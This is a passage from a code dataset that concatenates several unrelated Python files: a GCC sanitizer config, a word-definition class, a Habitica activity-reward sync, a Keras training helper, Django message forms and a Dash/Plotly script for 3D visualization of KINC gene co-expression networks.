else:\n raise RuntimeError(\n 'Build with sanitizers is only supported for '\n 'GCC version greater than {}'.format(version_minimum))\n\n\ndef post_process_func(env):\n if env.get('sanitizers', False):\n enable_sanitizers(env, env.get('sanitizers_recover', False))\n\n\nconfig = configuration(map_default_version, post_process_func)\n\nconfig.VersionRange(\"*\")\n","sub_path":"parts-site/configurations/base/gcc_posix-any.py","file_name":"gcc_posix-any.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560406216","text":"\n\n#calss header\nclass _URETHRA():\n\tdef __init__(self,): \n\t\tself.name = \"URETHRA\"\n\t\tself.definitions = [u'the tube in most mammals that carries urine from the bladder out of the body. In males it also carries semen.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_urethra.py","file_name":"_urethra.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120978148","text":"# Standard imports\nimport json\nimport requests\nimport logging\nimport arrow\nimport attrdict as ad\n\n# Our imports\nimport emission.core.get_database as edb\nimport emission.net.ext_service.habitica.proxy as proxy\nimport emission.analysis.result.metrics.simple_metrics as earmts\nimport emission.analysis.result.metrics.time_grouping as earmt\n\n\n\ndef reward_active_transportation(user_id):\n logging.debug(\"Entering habitica autocheck for user %s\" % user_id)\n if edb.get_habitica_db().find({'user_id': user_id}).count() == 1:\n logging.debug(\"Habitica user: %s\" % list(edb.get_habitica_db().find({'user_id': user_id})))\n #make sure habits exist\n #bike\n bike_habit = {'type': \"habit\", 'text': \"Bike\", 'up': True, 'down': False, 'priority': 2}\n bike_habit_id = proxy.create_habit(user_id, bike_habit)\n #walk\n walk_habit = {'type': \"habit\", 'text': \"Walk\", 'up': True, 'down': False, 'priority': 2}\n walk_habit_id = proxy.create_habit(user_id, walk_habit)\n\n #get timestamps\n user_val = list(edb.get_habitica_db().find({\"user_id\": user_id}))[0]['metrics_data']\n timestamp_from_db = user_val['last_timestamp']\n timestamp_now = arrow.utcnow().timestamp\n \n #Get metrics\n summary_ts = earmt.group_by_timestamp(user_id, timestamp_from_db, timestamp_now, None, earmts.get_distance)\n logging.debug(\"Metrics response: %s\" % summary_ts)\n\n #get distances leftover from last timestamp\n bike_distance = user_val['bike_count']\n walk_distance = user_val['walk_count']\n\n #iterate over summary_ts and look for bike/on foot\n for item in summary_ts:\n try:\n bike_distance += item.BICYCLING\n logging.debug(\"bike_distance += %s\" % item.BICYCLING)\n except AttributeError:\n logging.debug(\"no bike\")\n try:\n walk_distance += item.ON_FOOT\n logging.debug(\"walk_distance += %s\" % item.ON_FOOT)\n except AttributeError:\n logging.debug(\"no Android walk\")\n try:\n walk_distance += item.WALKING\n logging.debug(\"walk_distance += %s\" % item.WALKING)\n except AttributeError:\n logging.debug(\"no ios walk\")\n try:\n walk_distance += item.RUNNING\n logging.debug(\"walk_distance += %s\" % item.RUNNING)\n except AttributeError:\n logging.debug(\"no running\")\n \n logging.debug(\"Finished with bike_distance == %s\" % bike_distance)\n logging.debug(\"Finished with walk_distance == %s\" % walk_distance)\n\n method_uri_walk = \"/api/v3/tasks/\"+ walk_habit_id + \"/score/up\"\n method_uri_bike = \"/api/v3/tasks/\"+ bike_habit_id + \"/score/up\"\n #reward user by scoring + habits\n # Walk: +1 for every km\n walk_pts = int(walk_distance//1000)\n for i in range(walk_pts):\n res = proxy.habiticaProxy(user_id, 'POST', method_uri_walk, None)\n logging.debug(\"Request to score walk points %s\" % res)\n # Bike: +1 for every 3 km\n bike_pts = int(bike_distance//3000)\n for i in range(bike_pts):\n res2 = proxy.habiticaProxy(user_id, 'POST', method_uri_bike, None)\n logging.debug(\"Request to score bike points %s\" % res2)\n\n #update the timestamp and bike/walk counts in db\n edb.get_habitica_db().update({\"user_id\": user_id},{\"$set\": {'metrics_data': {'last_timestamp': arrow.utcnow().timestamp, 'bike_count': bike_distance%3000, 'walk_count': walk_distance%1000}}},upsert=True)\n logging.debug(\"Habitica user after update: %s\" % list(edb.get_habitica_db().find({'user_id': user_id})))\n\n\n\n","sub_path":"emission/net/ext_service/habitica/sync_habitica.py","file_name":"sync_habitica.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599033030","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import Sequential, load_model, save_model\nfrom sklearn.metrics import classification_report\nimport os\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom bson import json_util\nimport json\n\nclass Helper:\n\n def __init__(self, train_directory, test_directory, validation_directory = None):\n self.train_directory = train_directory\n self.validation_directory = validation_directory\n self.test_directory = test_directory\n self.model_directory = 'models/'\n self.results_directory = 'results/'\n self.logs_directory = 'logs/cnn-topomap-log-{}'\n self.y_true = []\n\n if not os.path.exists(self.model_directory):\n os.mkdir(self.model_directory)\n\n if not os.path.exists(self.results_directory):\n os.mkdir(self.results_directory)\n\n if not os.path.exists('logs'):\n os.mkdir('logs')\n\n\n def construct_data_generator(self, batch_size=128, validation_split=None, target_size=(224,224), shuffle=False):\n\n datagen = ImageDataGenerator(rescale=1./255, validation_split=validation_split)\n\n train_it = datagen.flow_from_directory(self.train_directory, batch_size=batch_size,\n target_size=target_size, shuffle=shuffle)\n\n test_it = datagen.flow_from_directory(self.test_directory, batch_size=batch_size,\n target_size=target_size, shuffle=False)\n\n self.y_true = test_it.classes\n\n return train_it, test_it\n\n def construct_data_generator_w_validation(self, batch_size=128, target_size=(224,224), shuffle=True):\n\n datagen = ImageDataGenerator(rescale=1./255)\n\n train_it = datagen.flow_from_directory(self.train_directory, batch_size=batch_size,\n target_size=target_size, shuffle=shuffle )\n\n validation_it = datagen.flow_from_directory(self.validation_directory, batch_size=batch_size,\n target_size=target_size, shuffle=shuffle)\n\n test_it = datagen.flow_from_directory(self.test_directory, batch_size=batch_size,\n target_size=target_size, shuffle=False)\n\n self.y_true = test_it.classes\n\n return train_it, validation_it, test_it\n\n def plot_examples(self, example_type = 'train', classes = [1, 2, 3, 4, 5]):\n path = ''\n if example_type is 'train':\n path = self.train_directory\n if example_type is 'test':\n path = self.test_directory\n if example_type is 'validation':\n path = self.validation_directory\n\n\n img_cls_0 = os.listdir(path + str(classes[0]))\n img_cls_1 = os.listdir(path + str(classes[1]))\n img_cls_2 = os.listdir(path + str(classes[2]))\n img_cls_3 = os.listdir(path + str(classes[3]))\n img_cls_4 = os.listdir(path + str(classes[4]))\n\n rand_index = np.random.randint(len(img_cls_0))\n\n img1 = cv2.imread(path + str(classes[0]) + '/' + img_cls_0[rand_index])\n img2 = cv2.imread(path + str(classes[1]) + '/' + img_cls_1[rand_index])\n img3 = cv2.imread(path + str(classes[2]) + '/' + img_cls_2[rand_index])\n img4 = cv2.imread(path + str(classes[3]) + '/' + img_cls_3[rand_index])\n img5 = cv2.imread(path + str(classes[4]) + '/' + img_cls_4[rand_index])\n\n print(path + str(classes[0]) + img_cls_0[rand_index])\n fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(ncols = 5, figsize = (20, 5))\n\n ax1.imshow(img1)\n ax2.imshow(img2)\n ax3.imshow(img3)\n ax4.imshow(img4)\n ax5.imshow(img5)\n\n\n\n def load(self, path):\n model = load_model(path)\n return model\n\n def save(self, model, history, evaluator, y_prob, name):\n path_model = self.model_directory + name + '.h5'\n path_results = self.results_directory + name + '.txt'\n\n save_model(model, path_model)\n print('model saved, path: {}'.format(path_model))\n\n y_pred = np.argmax(y_prob, axis=1)\n\n report = pd.DataFrame(classification_report(self.y_true, y_pred, output_dict=True)).transpose()\n\n with open(path_results, 'a') as file:\n model.summary(print_fn = lambda x: file.write(x + '\\n'))\n result = '{}:{}\\n{}:{}'.format(model.metrics_names[0], evaluator[0], model.metrics_names[1], evaluator[1])\n file.write(result)\n file.write('\\n')\n file.write('trained using {} epochs'.format(len(history.epoch)))\n file.write('\\n')\n file.write(report.to_string())\n\n\n def print_json(self, result):\n \"\"\"Pretty-print a jsonable structure (e.g.: result).\"\"\"\n print(json.dumps(\n result,\n default=json_util.default, sort_keys=True,\n indent=4, separators=(',', ': '),\n ))\n\n\n def save_json_result(self, model_name, result):\n \"\"\"Save json to a directory and a filename.\"\"\"\n result_name = '{}.txt.json'.format(model_name)\n if not os.path.exists(self.results_directory):\n os.makedirs(self.results_directory)\n with open(os.path.join(self.results_directory, result_name), 'w') as f:\n json.dump(\n result, f,\n default=json_util.default, sort_keys=True,\n indent=4, separators=(',', ': ')\n )\n\n\n def load_json_result(self, best_result_name):\n \"\"\"Load json from a path (directory + filename).\"\"\"\n result_path = os.path.join(self.results_directory, best_result_name)\n with open(result_path, 'r') as f:\n return json.JSONDecoder().decode(\n f.read()\n # default=json_util.default,\n # separators=(',', ': ')\n )\n\n\n def load_best_hyperspace(self):\n results = [\n f for f in list(sorted(os.listdir(self.results_directory))) if 'json' in f\n ]\n if len(results) == 0:\n return None\n\n best_result_name = results[-1]\n return self.load_json_result(best_result_name)[\"space\"]\n","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128658153","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom .models import Messages, Comments\n\n\nclass MessagesForm(forms.ModelForm):\n \n class Meta:\n model = Messages\n exclude = [\n 'date_created',\n ]\n\n def clean_title(self):\n title = self.cleaned_data['title']\n if len(title) == 0 and len(title) > 20:\n raise ValidationError('title is invalid')\n return title\n\n def clean_message(self):\n message = self.cleaned_data['message']\n if len(message) == 0 and len(message) > 200:\n raise ValidationError('Message is invalid')\n return message\n\n\nclass CommentsForm(forms.ModelForm):\n \n class Meta:\n model = Comments\n fields = exclude = [\n 'date_created',\n ]\n\n def clean_comment(self):\n comment = self.cleaned_data['comment']\n if len(comment) == 0 and len(comment) > 150:\n raise ValidationError('Comment is invalid')\n return comment\n \n # def save(self, commit=True, messages=None):\n # if messages is None:\n # raise ValueError('Message was not set')\n # \n # inst = super(CommentsForm, self).save(commit=False)\n # inst.delivery = messages\n # if commit:\n # inst.save()\n # \n # return inst\n\n","sub_path":"Tceh_HW_17/mgs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"134810730","text":"#!/usr/bin/env python3\n\"\"\"\nCreates a Dash application that provides 3D visualization of a KINC network.\n\nFor usage instructions run this script with the --help flag.\n\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport igraph as ig\nimport plotly as py\nimport seaborn as sns\nimport plotly.graph_objects as go\nfrom fa2 import ForceAtlas2\nimport random\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport os\nimport json\nimport re\nimport ast\nimport time\nimport base64\nfrom progress.bar import IncrementalBar\nimport socket\n\n\n\n\n\ndef load_network(file_path):\n \"\"\"\n Imports the KINC-generated network file (either full or Tidy versions).\n\n file_path : The path to the network file.\n\n return : A pandas dataframe containing the network.\n \"\"\"\n\n net = pd.read_csv(file_path, sep=\"\\t\")\n\n # Make sure the file has the required columns\n columns = net.columns\n if ('Source' not in columns) | ('Target' not in columns) | ('Samples' not in columns) | ('p_value' not in columns) | ('r_squared' not in columns) |('Test_Name' not in columns):\n print(\"ERROR: The network file does not seem to be KINC tidy file. It is missing one or more of the following column headers: Source, Target, Samples, p_value, r_squared or Test_Name. Please check the file.\")\n exit(1)\n\n return net\n\n\n\n\n\ndef load_gem(file_path):\n \"\"\"\n Imports the tab-delimited Gene Expression Matrix (GEM) or Metabolite\n\n GEM files can be generated from RNA-seq data using GEMmaker. Alternatively,\n this can be a metabolite abundance matrix.\n\n file_path : The path to the GEM file. The file should be log2 transformed.\n\n return : A pandas dataframe containing the GEM.\n \"\"\"\n\n gem = pd.read_csv(file_path, sep=\"\\t\")\n return gem\n\n\n\n\n\ndef load_amx(file_path, sample_col = 'Sample'):\n \"\"\"\n Imports the tab-delimited annotation matrix (amx).\n\n The matrix must have at least one column that contains a unique list of\n sample names.\n\n file_path : The path to the annotation matrix.\n\n sample_col : The name of the column that contains the sample names. Defaults\n to 'Sample'\n\n return : A pandas dataframe containing the annotation matrix.\n \"\"\"\n amx = pd.read_csv(file_path, sep=\"\\t\")\n amx.index = amx[sample_col]\n return amx\n\n\n\n\n\ndef load_node_meta(file_path):\n \"\"\"\n Imports the tab-delimited node metadata file.\n\n The format of the file must have 4 columns, with the first containing the\n node name, the second a controlled vocabulary term ID, the third the\n term definition and the fourth the vocubulary name.\n \"\"\"\n nmeta = pd.read_csv(file_path, sep=\"\\t\")\n nmeta.columns = ['Node', 'Term', 'Definition', 'Vocabulary']\n nmeta.index = nmeta['Node']\n return nmeta\n\n\n\n\n\ndef get_iGraph(net):\n \"\"\"\n Converts the KINC network dataframe into an iGraph object.\n\n Igraph objects are handly for performing network statistics such as\n transitivity and degree calculations.\n\n net : The network dataframe created by the load_network function.\n\n return : An igraph object of the network loaded with the source, target and\n Similarity_Score (as the weight)\n \"\"\"\n g = ig.Graph()\n\n # Add the nodes\n v = pd.concat([net['Source'], net['Target']]).unique()\n g.add_vertices(v)\n\n # Add the edges\n g.add_edges(net[['Source', 'Target']].values)\n\n # Add the edge w\n #g.es['weight'] = net['Similarity_Score']\n\n return g\n\n\n\n\n\ndef calculate_2d_layout(net, net_prefix, redo_layout, iterations):\n \"\"\"\n Calculates a typical 2D layout for the network.\n\n The first time this function is called on a network it may take some time\n depending on the size of the network. The layout is saved in a file with\n the same name as the network but with a '.glayout.txt' extension in\n the working directory. On subsequent runs of this program that file is\n imported if it exists.\n\n net : The network dataframe created by the load_network function.\n\n net_prefix : The filename of the file that will house the layout\n after it is calculated. The file will be saved with this name\n and the extension \".2Dlayout.txt\"\n\n redo_layout : A boolean indicting if the layout should be rebuilt rather\n than loading from file if one exists already.\n\n return : a Pandas dataframe containing the layout coordinates for\n the nodes in the network. The dataframe contains X, and Y\n dimenstional coordinates.\n \"\"\"\n\n g = get_iGraph(net)\n g.simplify()\n t = pd.Series(g.transitivity_local_undirected(), index=g.vs['name'])\n d = pd.DataFrame(g.degree(), index=g.vs['name'], columns=['Degree'])\n\n forceatlas2 = ForceAtlas2(\n # Behavior alternatives\n outboundAttractionDistribution=True, # Dissuade hubs\n linLogMode=False, # NOT IMPLEMENTED\n adjustSizes=False, # Prevent overlap (NOT IMPLEMENTED)\n edgeWeightInfluence=1.0,\n\n # Performance\n jitterTolerance=1.0, # Tolerance\n barnesHutOptimize=True,\n barnesHutTheta=1.2,\n multiThreaded=False, # NOT IMPLEMENTED\n\n # Tuning\n scalingRatio=2.0,\n strongGravityMode=False,\n gravity=1,\n\n # Log\n verbose=True)\n\n if (redo_layout | (not os.path.exists(net_prefix + '.2Dlayout.txt'))):\n print(\"Calculating 2D layout.\")\n glayout = pd.DataFrame(forceatlas2.forceatlas2_igraph_layout(g, iterations=iterations).coords)\n glayout.columns = ['X', 'Y']\n glayout.index = g.vs['name']\n glayout = pd.concat([glayout, d, t], axis=1, sort=False)\n glayout.columns = ['X', 'Y', 'Degree', 'CC']\n glayout.to_csv(net_prefix + '.2Dlayout.txt')\n else:\n glayout = pd.read_csv(net_prefix + '.2Dlayout.txt', index_col=0)\n\n return glayout\n\n\n\n\n\ndef bin_edges(net):\n \"\"\"\n Calculates a set of bins using the Similarity score and P-value.\n\n It is from these bins that the edges and nodes of the network will be\n stacked in the z-axis of the 3D plot and or colored. Four new\n columns are added to the provided network: 'Edge_Bin', 'Pval_Bin',\n 'Rsqr_Bin' and 'Relationship'.\n\n net : The network dataframe created by the load_network function.\n\n \"\"\"\n net['Edge_Bin'] = np.around(np.abs(net['Similarity_Score']), decimals=2)\n net['Pval_Bin'] = np.round(-np.log10(net['p_value']))\n if 'hotelling_p_value' in net.columns:\n net['HPval_Bin'] = np.round(-np.log10(net['hotelling_p_value']))\n if (net['r_squared'].dtype == 'object'):\n net['Rsqr_Bin'] = 0\n else:\n net['Rsqr_Bin'] = np.around(net['r_squared'], decimals=1)\n net['Relationship'] = np.ceil(net['Similarity_Score']).astype('str')\n net['Relationship'] = net['Relationship'].replace(\"-0.0\", 'Negative')\n net['Relationship'] = net['Relationship'].replace(\"1.0\", 'Positive')\n\n\n\n\n\ndef get_vertex_zlayers(net, glayout, net_prefix, redo_layout):\n \"\"\"\n Uses the 2D layout and calculates the Z-coordinate for the nodes.\n\n net : The network dataframe created by the load_network function.\n\n glayout : The dataframe containing the 2D layout of the nodes.\n\n net_prefix: The filename of the file that will house the vertex layout\n after it is calculated. The file will be saved with this name\n and the extension \".3Dvlayers.txt\"\n\n redo_layout : A boolean indicting if the layout should be rebuilt rather\n than loading from file if one exists already.\n\n return : A Pandas dataframe containing the X, Y and Z coordinates for the\n nodes as well as the Degree and CC (clustering coefficient) for\n each node.\n \"\"\"\n\n def find_vlayers(row, vtype='Source', bar=None):\n if bar:\n bar.next()\n node = glayout.loc[row[vtype]]\n ebin = row['Edge_Bin']\n pbin = row['Pval_Bin']\n hpbin = np.nan\n if ('HPval_Bin' in row.index):\n hpbin = row['HPval_Bin']\n rbin = row['Rsqr_Bin']\n rel = row['Relationship']\n test = row['Test_Name']\n return(row[vtype], node['X'], node['Y'], ebin, pbin, hpbin, rbin, rel, test, node['Degree'], node['CC'])\n\n\n if (redo_layout | (not os.path.exists(net_prefix + '.3Dvlayers.txt'))):\n print(\"Calculating 3D vertex layout.\")\n bar = IncrementalBar('', max=net.shape[0]*2, suffix='%(percent)d%%')\n lsource = net.apply(find_vlayers, vtype='Source', bar=bar, axis=1)\n ltarget = net.apply(find_vlayers, vtype='Target', bar=bar, axis=1)\n print(\"\")\n\n columns = ['Vertex', 'X', 'Y', 'EBin', 'PBin', 'HPBin', 'RBin', 'Rel', 'Test_Name', 'Degree', 'CC']\n vlayers = pd.DataFrame.from_records(lsource.append(ltarget).values, columns=columns)\n vlayers = vlayers[vlayers.duplicated() == False]\n # We want to place the node in the layer where it first appears.\n vlayers = vlayers.groupby(by=['Vertex']).apply(lambda g: g[g['EBin'] == g['EBin'].max()])\n vlayers.reset_index(inplace=True, drop=True)\n vlayers.to_csv(net_prefix + '.3Dvlayers.txt')\n\n else:\n vlayers = pd.read_csv(net_prefix + '.3Dvlayers.txt', index_col=0)\n\n return vlayers\n\n\n\n\n\ndef get_edge_zlayers(net, glayout, net_prefix, redo_layout):\n \"\"\"\n Uses the 2D layout and calculates the Z-coordinate for the edges.\n\n Edges are drawn as lines in the 3D scatterplot, therefore this function\n calculates the start and stop coordinates for the edges in the format\n required by the scatter3d viewer.\n\n net : The network dataframe created by the load_network function.\n\n glayout : The dataframe containing the 2D layout of the nodes.\n\n net_prefix: The filename of the file that will house the vertex layout\n after it is calculated. The file will be saved with this name\n and the extension \".3Delayers.txt\"\n\n redo_layout : A boolean indicting if the layout should be rebuilt rather\n than loading from file if one exists already.\n\n return : A Pandas dataframe containing the X, Y and Z coordinates arrays\n for the edges as well as Source, Target and Samples values from\n the original network. The X, Y and Z coordiantes are tuples.\n \"\"\"\n\n def place_elayers(row, bar = None):\n if bar:\n bar.next()\n ebin = row['Edge_Bin']\n pbin = row['Pval_Bin']\n hpbin = np.nan\n if ('HPval_Bin' in row.index):\n hpbin = row['HPval_Bin']\n rbin = row['Rsqr_Bin']\n rel = row['Relationship']\n test = row['Test_Name']\n source = glayout.loc[row[\"Source\"]]\n target = glayout.loc[row[\"Target\"]]\n return([[source['X'], target['X'], None],\n [source['Y'], target['Y'], None],\n row[\"Source\"],\n row[\"Target\"],\n row[\"Samples\"],\n ebin, pbin, hpbin, rbin, rel, test])\n\n if (redo_layout | (not os.path.exists(net_prefix + '.3Delayers.txt'))):\n print(\"Calculating 3D edge layout.\")\n bar = IncrementalBar('', max=net.shape[0], suffix='%(percent)d%%')\n ledge = net.apply(place_elayers, bar=bar, axis=1)\n print(\"\")\n\n elayers = pd.DataFrame.from_records(ledge, columns=['X', 'Y', 'Source', 'Target', 'Samples', 'EBin', 'PBin', 'HPBin', 'RBin', 'Rel', 'Test_Name'])\n elayers['name'] = elayers['Source'] + \" (co) \" + elayers['Target']\n elayers.to_csv(net_prefix + '.3Delayers.txt')\n else:\n elayers = pd.read_csv(net_prefix + '.3Delayers.txt', index_col=0)\n elayers['X'] = elayers['X'].apply(ast.literal_eval)\n elayers['Y'] = elayers['Y'].apply(ast.literal_eval)\n\n return elayers\n\n\n\n\n\ndef create_network_plot(net, vlayers, elayers, color_by = 'Score', layer_by = 'Score',\n camera = None, aspect = None):\n \"\"\"\n Uses Plotly to create the interactive 3D visualization of the network.\n\n This function uses the Scatter3D plot to draw the network. The axes are\n hidden so it appears as a typical network view. It defaults to\n a straight on view as the network would be seen in a typical 2D viewer like\n Cytoscape.\n\n net : The network dataframe created by the load_network function.\n\n vlayers : The dataframe containing the 3D coordinates for the nodes.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n camera : A dictionary containing the figure camera coordinates.\n\n return : a Plotly figure object.\n \"\"\"\n\n # Default Z-indexs for lines/points to the Score value.\n Z = vlayers['EBin']\n if layer_by == 'Score':\n Z = vlayers['EBin']\n if layer_by == 'P-value':\n Z = vlayers['PBin']\n if layer_by == 'Hotelling P-value (phased)':\n Z = vlayers['HPBin']\n if layer_by == 'R^2':\n Z = vlayers['RBin']\n if layer_by == 'Test Name':\n Z = vlayers['Test_Name']\n if layer_by == 'Relationship':\n Z = vlayers['Rel']\n # Add the network nodes as the first trace.\n fig1 = go.Figure(data=[go.Scatter3d(x=vlayers['X'], y=vlayers['Y'],\n z=Z, mode='markers',\n opacity = 0.5,\n marker=dict(symbol='circle', size=np.log10(vlayers['Degree'])*4,\n line=dict(width=1, color=\"#888888\")),\n text=\"Node: \" + vlayers['Vertex'],\n customdata=vlayers['Vertex'],\n hoverinfo='text', name='Nodes')])\n\n # Add the edges and bin them\n include_slider = True\n if color_by == 'Score':\n slider_title = 'Similarity Score'\n if color_by == 'P-value':\n slider_title = '-log10(p)'\n if color_by == 'Hotelling P-value (phased)':\n slider_title = '-log10(p)'\n if color_by == 'R^2':\n slider_title = 'R-squared'\n if color_by == 'Test Name':\n slider_title = 'Test Name'\n include_slider = False\n if color_by == 'Relationship':\n slider_title = 'Relationship Type'\n include_slider = False\n\n layer_title = layer_by\n if layer_by == 'P-value':\n layer_title = '-log10(p)'\n if layer_by == 'Hotelling P-value (phased)':\n layer_title = '-log10(p)'\n\n (colorway, sliders, nticks) = create_binned_network_figure(fig1, elayers, color_by,\n layer_by, slider_title, include_slider)\n\n fig1.update_layout(\n autosize=True,\n #title=dict(text = \"3D Network View\", font = dict(color='#FFFFFF')),\n showlegend=True,\n legend=dict(font = dict(color=\"#FFFFFF\")),\n margin=dict(l=450, r=10, t=10, b=10),\n paper_bgcolor=\"#000000\",\n colorway=colorway,\n scene=dict(\n aspectmode=\"cube\",\n xaxis=dict(showbackground=False, showline=False, zeroline=False, showgrid=False,\n showticklabels=False, title='', showspikes=False),\n yaxis=dict(showbackground=False, showline=False, zeroline=False, showgrid=False,\n showticklabels=False, title='', showspikes=False),\n zaxis=dict(showbackground=False, showline=False, zeroline=False, showgrid=False,\n showticklabels=True, tickmode=\"auto\", nticks=nticks, title=layer_title, showspikes=False, color=\"#FFFFFF\")\n ),\n hovermode='closest',\n annotations=[dict(showarrow=False, text=\"\", xref='paper', yref='paper',\n x=0, y=0.1, xanchor='left', yanchor='bottom', font=dict(size=14))\n ],\n sliders=sliders,\n )\n\n # We want an orthographic layout so that when looking above the edges line up\n # with the nodes.\n fig1.layout.scene.camera.projection.type = \"orthographic\"\n fig1.layout.scene.camera.eye = dict(x=0, y=0, z=2)\n if camera:\n fig1.layout.scene.camera.eye = camera['eye']\n\n fig1.layout.scene.aspectmode = 'manual'\n if aspect:\n fig1.layout.scene.aspectratio = aspect\n\n return fig1\n\n\n\n\n\ndef create_binned_network_figure(figure, elayers, color_by = 'Score',\n layer_by = 'Score', slider_title = 'Similarity Score', include_slider = True):\n\n \"\"\"\n Adds the traces for the network figure based on the bin column.\n\n \"\"\"\n\n color_col = 'EBin'\n if color_col == 'Score':\n color_col = 'EBin'\n if color_by == 'P-value':\n color_col = 'PBin'\n if color_by == 'Hotelling P-value (phased)':\n color_col = 'HPBin'\n if color_by == 'R^2':\n color_col = 'RBin'\n if color_by == 'Test Name':\n color_col = 'Test_Name'\n if color_by == 'Relationship':\n color_col = 'Rel'\n\n layer_col = 'EBin'\n if layer_by == 'Score':\n layer_col = 'EBin'\n if layer_by == 'P-value':\n layer_col = 'PBin'\n if layer_by == 'Hotelling P-value (phased)':\n layer_col = 'HPBin'\n if layer_by == 'R^2':\n layer_col = 'RBin'\n if layer_by == 'Test Name':\n layer_col = 'Test_Name'\n if layer_by == 'Relationship':\n layer_col = 'Rel'\n\n # Add edge traces to the figure, one each per bin.\n layer_bins = np.flip(np.sort(elayers[layer_col].unique()))\n color_bins = np.flip(np.sort(elayers[color_col].unique()))\n for bin in color_bins:\n if (not type(bin) == str):\n if (bin.dtype == \"float64\") & (np.isnan(bin)):\n continue\n\n bin_edges = elayers[elayers[color_col] == bin]\n\n # Reformat the elayers for use by the Scatter3d function.\n eX = np.hstack(bin_edges['X'])\n eY = np.hstack(bin_edges['Y'])\n eZ = np.hstack(bin_edges[layer_col].repeat(3))\n names = bin_edges['name'][bin_edges.index.repeat(3)]\n\n # Create the scatterplot containing the lines for edges.\n figure.add_trace(go.Scatter3d(x=eX, y=eY, z=eZ,\n mode='lines',\n line=dict(width=1),\n text=\"Edge: \" + names,\n hoverinfo='text', name=bin,\n customdata=bin_edges.index.repeat(3)))\n\n # Add a slider for the network viewer\n if include_slider:\n steps = []\n steps.append(dict(\n method=\"restyle\",\n args=[\"visible\", [True] * (len(color_bins) + 2)],\n label='all'\n ))\n steps.append(dict(\n method=\"restyle\",\n args=[\"visible\", [False] * (len(color_bins) + 2)],\n label='nodes'\n ))\n steps[1][\"args\"][1][0] = True\n for i in range(len(color_bins)):\n step = dict(\n method=\"restyle\",\n args=[\"visible\", [False] * (len(color_bins) + 2)],\n label=color_bins[i]\n )\n # Turn on the layers for this step and leave on the nodes layer.\n step[\"args\"][1][0] = True\n for j in range(1,i+2):\n step[\"args\"][1][j] = True\n\n # Set the label.\n steps.append(step)\n\n\n colorway = [\"#FFFFFF\"] + sns.color_palette('viridis_r', color_bins.size).as_hex()\n\n sliders = [dict(\n active=0,\n currentvalue={\"prefix\": slider_title + \": \"},\n pad={\"b\": 50},\n steps=steps,\n font=dict(color = '#FFFFFF'),\n tickcolor='#FFFFFF',\n len=1)]\n else:\n colorway = [\"#FFFFFF\"] + sns.color_palette('muted', color_bins.size).as_hex()\n sliders = []\n\n nticks = layer_bins.size\n if layer_by == 'Score':\n nticks = int(nticks / 2)\n return (colorway, sliders, nticks)\n\n\n\n\n\ndef create_degree_distribution_plot(vlayers):\n \"\"\"\n Creates a 2D scatterplot containing the degree distribution\n \"\"\"\n vdata = vlayers.loc[:,('Vertex', 'Degree')].drop_duplicates()\n vdata = vdata.groupby('Degree').agg(['count']).reset_index()\n\n fig = go.Figure(data=[go.Scatter(\n x=vdata['Degree'],\n y=vdata['Vertex']['count'],\n mode='markers',\n marker=dict(symbol='circle', size=5, color='#000088'))])\n fig.update_layout(\n height=350,\n title=\"Node Degree Distribution\",\n margin=dict(l=10, r=10, t=80, b=20),\n xaxis_type=\"log\",\n yaxis_type=\"log\",\n xaxis_title=\"Degree\",\n yaxis_title=\"Number of Nodes\",\n )\n return fig\n\n\n\n\n\ndef create_avg_cc_distribution_plot(vlayers):\n \"\"\"\n Creates a 2D scatterplot containing the average clustering coefficient distribution\n \"\"\"\n vdata = vlayers.loc[:,('CC', 'Degree')].drop_duplicates()\n vdata = vdata.groupby('Degree').agg(['mean']).reset_index()\n\n fig = go.Figure(data=[go.Scatter(\n x=vdata['Degree'],\n y=vdata['CC']['mean'],\n mode='markers',\n marker=dict(symbol='circle', size=5, color='#000088'))])\n fig.update_layout(\n height=350,\n title=\"Avg. Clusering Coefficient Distribution\",\n margin=dict(l=10, r=10, t=80, b=10),\n xaxis_type=\"log\",\n yaxis_type=\"log\",\n xaxis_title=\"Degree\",\n yaxis_title=\"Number of Nodes\",\n )\n return fig\n\n\n\n\ndef create_expression_scatterplot(gem, amx, elayers, color_col=None, edge_index = None):\n \"\"\"\n Uses Plotly to create the interactive 3D scatterplot of co-expression\n\n This function uses the Scatter3D plot to draw the co-expression scatterplot.\n It defaults to a straight on view but can be interactively rotated,\n panned, etc.\n\n net : The network dataframe created by the load_network function.\n\n amx : The annotation matrix dataframe created by the load_amx function.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n color_col : The name of the column in the amx that contains the category\n that should be used for coloring the points in the plot.\n\n edge_index : The numerical index of the edge in the elayers dataframe\n that is to be plotted.\n\n return : a Plotly figure object.\n \"\"\"\n if edge_index is None:\n return go.Figure(go.Scatter3d())\n\n node1 = elayers.iloc[edge_index]['Source']\n node2 = elayers.iloc[edge_index]['Target']\n samples = elayers.iloc[edge_index]['Samples']\n\n\n # Generate the dataframe for the expression scatterplot\n sdata = pd.DataFrame(dict(X=gem.loc[node1].values, Y=gem.loc[node2].values))\n sdata.index = gem.columns\n sdata = sdata.join(amx, how='left')\n\n # Calculate the sizes of the points.\n sizes 